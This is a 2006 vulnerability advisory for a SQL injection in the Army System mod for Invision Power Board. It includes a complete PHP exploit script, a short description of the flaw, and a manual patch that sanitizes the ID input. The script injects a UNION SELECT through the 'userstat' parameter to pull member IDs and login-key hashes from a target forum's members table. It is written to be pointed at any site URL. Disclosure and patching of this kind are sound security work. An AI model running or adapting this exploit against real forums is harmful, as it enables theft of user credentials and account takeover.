VULNERABLE PRODUCT ----------------------------------- Invision Power Board Army System Mod Version: 2.1 and priors. Url: http://supersmashbrothers.2ya.com Vulnerability: Remote SQL Injection ----------------------------------------------------- BACKGROUND ---------------------------- Army System v2.1 is a very popular mods that has a ranking system built-in. This multiple player rpg can easily be installed on every Invision Power Board v2.x.x Source: "http://mods.invisionize.com/db/index.php/f/3347"; Google: "Army System 2.1 by supersmashbrothers" ******************************************************************** Requirements Minimum: Invision Board: 2.0.0 Final PHP: 4.1.0 Recommended Invision Board: 2.0.1 PHP: 4.3.0 or better SQL Any sql will work fine as long as you have the driver. Minimum MySQL: 3.23 Recommended MySQL: 3.23 or better Recommended for Larger sites: No memory limit and no safe mode for faster loading ******************************************************************** VULNERABILITY ------------------------------- Army System is prone to a SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input passed to the "userstat" parameter is not correctly sanitised before being used in a SQL query. A specially crafted URL could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. EXPLOIT ---------------- <?php /* --------------------------- EXPLOIT --------------------------- Invision Power Board Army System Mod 2.1 SQL Injection Exploit Tested on: Latest version (2.1.0) Discovered on: 06.02.2006 by Alex & fRoGGz Credits to: SecuBox Labs PLEASE READ THIS ! The query of the SQL Injection depends about the number of fields in the sql table We have successfully tested the exploit on a new fresh IPB 2.1.x with Army System Mod 2.1 installed IN NO EVENT SHALL THE OWNER OF THIS CODE OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ $target = "http://site.com/forums/";; // <--- Where ? $prefix = "ibf_"; // <--- SQL prefix ? $id = 1; // <--- Who ? print_r(get_infos($target,$prefix,$id)); if(!get_infos($target,$prefix,$id)) echo "failed"; function get_infos($target,$prefix,$id) { $inject = "index.php?s=&act=army&userstat=0+UNION+SELECT+id,member_login_key,"; $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,"; $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,NULL,NULL,"; $inject.= "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,"; $inject.= "NULL+FROM+".$prefix."members+WHERE+id="; $filename = $target . $inject . $id; $handle = fopen ($filename, "r"); $infos = array(); if (feof($handle)) { continue 2; } if ( $handle ) { while ( ($buffer = fgets( $handle )) ) { if ( strpos( $buffer, "<td class='pformleft' width=\"35%\">Name</td>") ) { $infos['md5'] = strip_tags ( fgets( $handle) ); break; } } } fclose ($handle); if (count($infos) == 1) return $infos; return false; } ?> VENDOR STATUS --------------------------- There is no solution at the time. Edit the source code manually to solve this problem & many others ! // You could temporary fix the problem: // Find sources/action_public/army.php (line 486:$id2 = $this->ipsclass->input['ID']; // After the line put: $id2 = ereg_replace('([^0-9])','',$id2); $id2 = (int)$id2; ----------------------------------------------------------------------------- CREDiTS ------------------------------ SecuBox Labs - fRoGGz & Alex Greet's fly out to: Mark aka MT Visit: http://secubox.shadock.net --------------------------------------------